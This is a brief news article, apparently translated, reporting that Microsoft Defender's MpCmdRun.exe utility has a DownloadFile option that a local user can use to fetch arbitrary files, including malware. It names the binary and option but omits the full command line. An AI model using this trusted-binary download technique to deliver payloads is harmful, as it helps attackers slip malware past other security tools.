DownloadFile: this command used in Defender and System Console
Table of contents:
When it comes to keeping our computer protected against external threats, for some time now we have heard all the benefits offered by Microsoft Defender, the antivirus protection system that already comes integrated with Windows 10 and that prevents us from forcibly having to install a third-party solution. We can install another antivirus, nothing happens, but it is not mandatory.
Microsoft Defender works really well, that's for sure, but it's not perfect, that's also true. And that becomes clear when we see how the tool designed to protect our computer can help us to infect it more easily thanks to a command.Seeing is believing.
DownloadFile
The BleepingComputer colleagues have echoed the news. The person responsible for this possibility is a simple command, the one you can see illustrated in this paragraph: DownloadFile. A command that allows using Microsoft Defender through the command console we can download almost any type of content
It was the security researcher, Mohammad Askar, who discovered that using the Command Console> allows you to download any file and of course malware . He has announced it on his Twitter account"
Microsoft Defender in this way has a wide open door which, if the user wishes, can become a major threat without the program takes action to prevent the fire.
A bug, if it can be called that, present since version 4.18.2007.9 or 4.18.2009.9, still unclear . Using the DownloadFile command, Askar has managed to download malware onto his computer with impunity
Microsoft is aware of this feature, as it was recently added to Windows Defender. In fact, they explain it that way on the support page where they explain the possible commands and how they work with Windows Defender.
Just enter the Command Console> and the system will not ask anything. Enter the address of the content to download and we will have it on our computer."
This security hole allows, as cited in Bleeping Computer, a local user to use the Microsoft Antimalware Service command line utility (MpCmdRun.exe) to download a file from a remote location using the command:
On the bright side, Microsoft Defender will detect malicious files downloaded with MpCmdRun.exe, but the question is whether other antiviruses will be able to do the same.
It is presumable that this bug, which has to be called something, will be corrected shortly with an update and it is that although its existence does not itself cause our equipment is unsafe (after all, it requires our action), it can be dangerous in malicious hands."
